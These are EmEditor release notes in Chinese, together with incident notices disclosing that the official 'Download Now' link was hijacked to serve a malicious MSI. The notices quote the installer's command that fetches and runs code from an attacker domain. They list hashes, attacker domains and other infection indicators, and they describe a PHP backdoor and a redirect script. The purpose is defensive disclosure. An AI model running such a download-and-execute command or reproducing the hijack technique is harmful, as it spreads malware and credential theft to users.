EmEditor v26.0.2 现已发布。本次更新重点提升稳定性,并包含以下列出的修复。我们建议更新到最新版本,以获得最佳体验。
如果您使用的是桌面安装程序版本,请在“帮助 > 检查更新”中进行更新。如果无法更新,请下载最新版本并运行安装程序。我们预计 Microsoft Store 版本将在未来几天内发布。如果您直接下载 MSI,请确认数字签名为 Emurasoft, Inc. 签署。
EmEditor v26.0.1 现已推出。此更新修复了与安装程序相关的问题。自 v26.0.0 起,程序本身没有任何更改。
我们今天发布了 EmEditor v26.0.0。
为了提升网页加载速度,开发者经常会对 JavaScript、CSS 和 HTML 进行“压缩(minify)”,也就是去掉换行和空格。同样地,像 XML 和 JSON 这样的数据格式也可能被压缩成单行,以便作为连续流更容易处理,即使这会损害可读性。有些科学数据甚至更极端——例如基因组序列(A、T、G、C)可以被存储为一条不断开的字符串,长度可达数十亿字符。这类文件正变得越来越常见,我们也经常听到用户反馈它们会让 EmEditor 变慢。由于这些文件包含异常长的单行内容,会对性能造成显著影响。在 v26.0 中,我们使用多线程和 SIMD 重新审查并优化了内部代码,我们的测试显示,与上一版本相比,打开/搜索/替换性能提升了 2.2× 到 666×。
EmEditor 从早期就支持 Unicode,但过去输入一些不易键入的字符——例如生僻汉字、外语字符或表情符号——并不方便。您必须打开 插入 > 特殊字符(Ctrl+Shift+I),输入代码值,插入字符,并在每次都重复这一流程。在 v26.0 中,我们将该对话框重新设计为一个可自定义的栏,可在工作时保持打开。它现在还支持按 Unicode 名称和 Unicode 区块搜索,用大字号易读字体显示结果,并可用彩色渲染支持彩色显示的字符(例如表情符号)。例如,搜索 “smiling” 会返回许多笑脸表情。
字符代码值对话框(Ctrl+I)也已更新,可用大号彩色字体显示字符,让复杂字符和表情符号更容易识别。
根据客户反馈,我们扩展了收藏夹功能。除了文件外,现在也可以将文件夹注册为收藏夹。选择某个文件夹会打开打开文件对话框,以便您选择想要的文件。我们还改进了拖放行为:当您从资源管理器拖入多个文件时,如果列表中已经存在同名文件(且未指定行/列),EmEditor 将不会重复添加。
用于 加粗、斜体 和 代码 的 Markdown 命令现在即使在未选中文本时也能生效。例如,当您在未选择任何内容的情况下执行 Markdown 加粗命令,然后开始输入时,您输入的文字将以加粗形式插入。
长期以来以非模态窗口提供的撤销/重做历史 对话框,现已转换为一个自定义栏。这样您就能更方便地把历史记录固定显示在合适的位置,同时继续编辑。
Makoto Emura 增强了他的与 AI 聊天和提交列表插件。在与 AI 聊天中,我们在输入框左侧新增了 “+ 文件” 按钮:如果您使用的是 OpenAI 模型,就可以将选中的文件上传到提示词中。这不仅让您比手动输入或粘贴更容易发送大量内容,还能附加诸如 HTML、PDF、Word 等受支持的文件。该功能使用了 OpenAI 的文件搜索功能。上传文件通常比将整个文件文本粘贴到聊天中消耗更少的令牌。我们还新增了在聊天历史(过往对话)中搜索的功能。请注意,AI 功能(包括与 AI 聊天)除了 EmEditor 之外,还需要安装单独的 ChatAI 插件。
在提交列表中,我们改进了多项操作的性能,包括显示变更列表和提交历史。
我们还修复了在预览版本中发现的问题。
我们希望 Pro 与 Free 版本都能符合您的期望。如果您有问题、功能需求或想法,请联系我们。
感谢您一直以来对 EmEditor 的支持。
— Yutaka Emura
如需查看包含主要变更与截图在内的详细信息,请参阅 Version 26.0 新增特性。
如果您使用的是桌面安装程序版本,请在“帮助 > 检查更新”中进行更新。如果无法更新,请下载最新版本并运行安装程序。我们预计 Microsoft Store 版本将在未来几天内发布。如果您直接下载 MSI,请确认数字签名为 Emurasoft, Inc. 签署。
EmEditor 现在获取更安全、更便捷
EmEditor 桌面安装程序现也可通过 Microsoft Store 获取。
Microsoft Store 上提供的桌面安装程序,对 EmEditor Professional 和 EmEditor Free 均为同一个程序 (您将获得同一款应用,并根据您的许可证/使用方式来使用)。
我们还改进了我们的官方网站(www.emeditor.com),让您能更安心地下载 EmEditor。
我们将继续仅通过我们的网站及其他授权分发渠道提供官方安装程序 。
为确保您的安全,请从我们的官方网站或 Microsoft Store 等可信来源下载 EmEditor。
EmEditor v25.4.5 现已可用。本次更新主要聚焦于稳定性,并包含以下修复。我们建议更新到最新版本以获得最佳体验。
如果你使用的是桌面安装程序版本,请前往 帮助 → 检查更新 下载最新版本。如果无法更新——或你当前未安装 EmEditor——请下载安装程序并运行。
EmEditor(桌面安装程序)现也可从 Microsoft 商店获取:
对于较早版本的 Windows,你可以直接在 此处 下载安装程序。
如果你直接下载 MSI 文件,请验证数字签名是否由 “Emurasoft, Inc.” 签署:
EmEditor 的更新检查器会自动验证 MSI 的签名者;如果签名者不是 Emurasoft, Inc.,将取消更新。
或者,你也可以验证 SHA-256 哈希值:
0035f22bc12f565e9fe904eabccd24a608903b4d76e8bda2ec758bfcd18b12e93e2e56fd146aff6324896893265a943058cf50905acb5130d14be12464bca5eaf9601e5ec55033aa7bcd0cdcd24e92f6db24321948c15e798605e4781d170c277e662f206947ea29289d3d755753190073d76b3f051dd6e1210224849441d3e52ed200c42b210d4dbabb9050094f059d4de9b9c5cebb8260b5b9f35591c749904bc21dbe4a5906c6f3a513fa0b049cf9ad953889c58b61f6018a8133a1fc32074c0854c141be7f9ddd70528303cee4d470a97eb10e40e6e3e59afe7d2d3fa12a877cd8192c2b6c4c676d7a31a3953daeb4e41adc0497c4fc565d26e333e28e22如果你使用桌面便携版,请访问下载页面获取最新版本。商店应用版本将在几天后可通过 Microsoft 商店更新。
EmEditor v25.4.4 现已推出。本次版本侧重于稳定性,并包含以下修复。我们建议更新到最新版本以获得最佳体验。
如果您使用的是桌面安装程序版本,请前往帮助 → 检查更新,下载最新版本。如果该方法无效,请下载安装程序(emed64_25.4.4.msi) 并运行。
如果您直接下载 MSI 文件,请验证其数字签名是否由 “Emurasoft, Inc.” 签署:
EmEditor 的更新检查器会自动验证 MSI 的签名者;如果签名者不是 Emurasoft, Inc.,将取消更新。
另外,您也可以使用以下 SHA-256 哈希值进行校验:
09e884896467b8fa574b2adf22d792e039774b8fb1300ec26a59c951937eaa3cf4db8fe290d3d5d44bd08461da24f168a73b085c6d589687f41b0a9a820556e8如果您使用桌面便携版,请访问下载页面获取最新版本。商店应用版本可在数日后通过 Microsoft 商店更新。
继我们先前发布的《【重要】关于 EmEditor 安装程序下载链接的安全事件通知》(www.emeditor.com)之后,我们在进一步调查中获得了更多信息,现与补充细节一并分享,以完善先前的通知内容。
我们再次就本次事件造成的严重担忧与不便,向大家致以诚挚的歉意。
在之前的通知中,我们提供了美国太平洋时间的范围。为便于参考,这里也同时给出协调世界时(UTC)。
如果您在上述期间通过 EmEditor 网站的下载路径(例如点击“Download Now”按钮)下载了安装程序,则有可能下载到的文件并非由我们(Emurasoft, Inc.)提供的合法安装程序。
请注意:出于极度谨慎,我们将上述时间范围刻意设置得较宽。实际受影响的窗口可能更短,且仅发生在特定时间段。
针对文件 emed64_25.4.3.msi,我们已确认至少存在 两个可疑文件。
我们还确认这两个可疑文件均带有 微软签发的数字签名。由于其有效期极短(仅数天),我们认为这些证书很可能是以类似面向开发者的方式签发的。
我们已将该事件报告给微软,提交了可疑文件并请求吊销相关签名。目前我们已确认 两个签名均已被吊销。因此,尝试运行该 MSI 时应会显示签名无效的警告,使安装变得困难。
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3ehttps://www.virustotal.com/gui/file/e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3ehttps://download.emeditor.info/emed64_25.4.3.msiemed64_25.4.3.msi4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98https://www.virustotal.com/gui/file/4bea333d3d2f2a32018cd6afe742c3b25bfcc6bfe8963179dad3940305b13c98emed64_25.4.3.msi3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fchttps://www.virustotal.com/gui/file/3d1763b037e66bbde222125a21b23fc24abd76ebab40589748ac69e2f37c27fc如果您仍保留下载的文件(emed64_25.4.3.msi),则可按(先前公告中的方法)通过检查数字签名和/或 SHA-256 来验证其真伪。
即便您已删除该文件,Windows 也可能在安装过程中将 MSI 的副本保存在 C:\Windows\Installer 目录下,并以不同名称存储。
由于该目录既隐藏又受系统保护,使用资源管理器常规浏览可能较难找到。请直接在地址栏输入并打开:C:\Windows\Installer。
打开后,我们建议按以下步骤操作。请务必小心,不要双击或运行任何 MSI 文件。
即便执行了可疑文件,在以下环境中也不一定会感染,例如:
但如果以下任意一项成立,则感染可能性会非常高:
C:\ProgramData\tmp_mojo.logGoogle Drive Caching 的计划任务%LOCALAPPDATA%\Google Drive Caching\ 下存在 background.vbsGoogle Drive Caching 的浏览器扩展(即使其声称由 Google 制作)——尤其是当其具备“读取和更改所有网站的数据”以及剪贴板访问权限时cachingdrive.comemeditorde.comemeditorgb.comemeditorjp.comemeditorsb.com若以上均不适用,则风险较低——但并非为零——因为攻击的一部分可能在内存中运行,几乎不留下文件层面的证据。
如先前公告所述,我们已确认可疑安装程序在执行后会从外部域名下载其他文件并执行。
此前我们确认其访问了 emeditorjp.com;后续调查还发现其额外访问了 emeditorde.com、emeditorgb.com、emeditorsb.com。
上述四个域名(emeditorjp.com、emeditorde.com、emeditorgb.com、emeditorsb.com)均非由我们(Emurasoft, Inc.)运营。
我们也确认了先前通知中描述的 PowerShell 命令会从外部域名下载并执行文件,这种行为可能导致恶意软件感染,并造成密码等个人信息被窃取。
更多细节请参阅由 Luca Palermo 先生与 Mario Ciccarelli 先生撰写的研究报告。Palermo 先生向我们提供了该报告并授权我们发布,在此对他们的协助表示诚挚感谢。
从基本事实来看,在特定条件下,第三方确实可能获取域名与数字签名。
从技术角度看,MSI 安装包可以通过自定义操作包含任意脚本(包括 PowerShell)。具备足够知识的攻击者可以在一个外观极其接近、且分发广泛的合法安装包中注入恶意加载器。
即便安装包是 EXE 而非 MSI,也依然可能发生类似攻击。
遗憾的是,这意味着软件公司很难从根本上阻止“高度仿冒的恶意安装程序”被创建并传播。我们必须假设未来仍可能出现类似复杂的、多阶段的恶意安装程序。
尽管如此,我们认为本次事件的核心问题可概括为:
由于两者同时发生,导致客户从我们官方网站下载后遭受伤害,我们对此承担全部责任,并会将其反映在未来的防范措施中。
除恶意安装程序 emed64_25.4.3.msi 外,我们还在某插件目录下发现了名为 base64.php 的文件。对 base64.php 分析后,我们判定其为典型后门(远程代码执行 / RCE)。
我们还发现 WordPress 主题目录中的 footer.php 被添加了脚本。该脚本劫持了原本指向合法 URL 的点击:
https://support.emeditor.com/ja/downloads/latest/installer/64并将其重定向到:
https://www.emeditor.com/wp-content/uploads/filebase/emeditor-core/emed64_25.4.3.msi因此,点击首页的“Download Now”按钮可能会下载到恶意文件。
更为恶意的是,该脚本被配置为仅对未登录访客触发,使管理员难以复现与发现问题。因此,即使我们自己检查网站时,也未能立即察觉重定向已被篡改。
我们仍在调查中,尚未得出最终结论。但我们正在考虑以下可能性:
WordPress 由多个组件构成——核心、插件、主题等——由许多开发者维护。这些组件会不断被发现漏洞,并陆续发布更新。
我们会定期更新插件与主题,但在某些情况下,漏洞可能长期未被修复。攻击可能利用了此类漏洞。
也有可能使用中的 SFTP 账号成为攻击目标。
我们已立即删除恶意文件 emed64_25.4.3.msi。同时检查文件修改日志,确认新增了 base64.php 并对 footer.php 做了更改。在将 base64.php 确认为后门后,我们对全站进行了扫描。
随后我们重建了网站,重新安装所有插件,并移除不必要的插件。我们也扫描了内部电脑,并更改了所有 WordPress 站点及相关服务的登录密码。我们通过日志审查对所使用的若干服务进行了审计。
此外,我们停止在“Download Now”等下载按钮中使用重定向,改为直接链接到已验证安全的文件。我们还更新了下载页面,明确展示 MSI 的 SHA-256,并加入提示以鼓励用户验证数字签名。
为进一步强化 EmEditor 首页下载路径,我们也在考虑近期将网站从 WordPress 迁移为自定义/静态网站。
如上所述,被篡改的安装程序在执行后可能进行极其危险的操作。同时,我们也无法从根本上阻止第三方创建并分发仿冒合法安装程序的恶意版本。
因此,我们最优先的目标是确保任何人都无法通过我们的网站获取恶意软件,因为网站是我们的主要分发渠道。
本次事件也提醒我们:尽管 Xoops、WordPress 等流行 CMS 平台使用方便,但其可扩展性会增加暴露于漏洞的风险;而仅仅保持插件与主题更新,并不能完全消除风险。
值得庆幸的是,Emurasoft Customer Center 并未被攻破,我们的数据库也保持安全。我们没有发现任何人访问了客户数据库的证据。
我们希望本次事件的经验能对其他软件公司有所帮助,因此尽可能提供了更多细节与背景,而不仅限于简短报告。
我们再次就造成的担忧与不便致以诚挚歉意,并特别向因感染相关问题而遭受损害的用户致歉。
感谢您一直以来对 EmEditor 的支持。
感谢您使用 EmEditor。
我们非常遗憾地通知您:我们已确认 EmEditor 官方网站的下载路径([Download Now] 按钮)发生了一起事件,疑似遭到第三方未授权篡改。在受影响期间,通过该按钮下载的安装程序可能并非我们(Emurasoft, Inc.)提供的正版文件。
对此可能造成的担忧与不便,我们深表歉意。请阅读以下信息。
如果您在上述期间通过 EmEditor 首页的 [Download Now] 按钮下载安装程序,则有可能下载到了一个没有我们数字签名的不同文件。这是保守估计;实际受影响时间可能更短,并且可能仅限于某一特定时间段。
[Download Now] 按钮正常情况下指向以下 URL:
该 URL 使用了重定向。然而在受影响期间,重定向设置疑似被第三方更改,导致下载被从以下(错误)URL 提供:
该文件并非由 Emurasoft, Inc. 创建,并且已被移除。
因此我们确认,下载到的文件数字签名可能不是我们,而是来自另一家名为 WALSHAM INVESTMENTS LIMITED 的组织。
注:此问题可能不限于英文页面,也可能影响其他语言的类似 URL(包括日文)。
目前唯一确认涉及的文件为:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e如果符合以下任一情况,则您不受影响:
download.emeditor.info 下载emed64_25.4.3.msi 文件如果您可能在受影响期间通过 [Download Now] 下载了安装程序,请验证 emed64_25.4.3.msi 文件的数字签名与 SHA-256 哈希。
emed64_25.4.3.msi),选择 属性(Properties)。如果未显示“数字签名”选项卡,可能表示该文件未签名或签名无法识别。此时请勿运行该文件;删除并按下方指引处理。
打开 PowerShell 并执行:
Get-FileHash .\emed64_25.4.3.msi -Algorithm SHA256确认输出的 SHA-256 与下列一致:
e5f9c1e9b586b59712cefa834b67f829ccbed183c6855040e6d42f0c0c3fcb3e如果数字签名不是 Emurasoft, Inc.(例如为 WALSHAM INVESTMENTS LIMITED)或 SHA-256 不匹配,则您可能获取了被篡改的文件(可能包含恶意软件)。
如果您在组织内使用 EmEditor,也建议联系内部安全团队(如 CSIRT),并尽可能保留相关日志。
该可疑安装程序在执行时可能尝试运行以下命令。在任何情况下都不要运行该命令。
powershell.exe "irm emeditorjp.com | iex"该命令会从 emeditorjp.com 下载并执行内容。
emeditorjp.com 并非 Emurasoft, Inc. 管理的域名。
另请注意:该安装程序可能仍会正常安装 EmEditor 并安装正版的 EmEditor 程序文件,这会使问题更难被察觉。
我们将继续调查事实并确定影响范围。一旦有更多信息,我们会在本页面和/或通过官方渠道尽快更新。
我们高度重视此次事件,并将采取必要措施查明原因、避免再次发生。
对于此次事件可能造成的不便与担忧,我们再次致以诚挚歉意,并感谢您对 EmEditor 的理解与持续支持。
今天,我们发布了 EmEditor v25.4.3。本次更新主要针对稳定性,并包含以下修复——为了获得最佳体验,请保持软件为最新版本:
如果您使用桌面安装版本,可以在帮助中选择检查更新以下载最新版本。如果此方法失败,请下载最新版本,并运行下载的安装程序。 如果您使用桌面便携版本,可以访问下载页面以下载最新版本。商店应用版本可以在几天后通过 Microsoft 商店更新。
今天,我们发布了 EmEditor v25.4.2。此次更新带来多项重要修复和优化,以确保您的使用体验流畅稳定,因此我们建议尽快更新。
如果您使用桌面安装版本,可以在帮助中选择检查更新以下载最新版本。如果此方法失败,请下载最新版本,并运行下载的安装程序。 如果您使用桌面便携版本,可以访问下载页面以下载最新版本。商店应用版本可以在几天后通过 Microsoft 商店更新。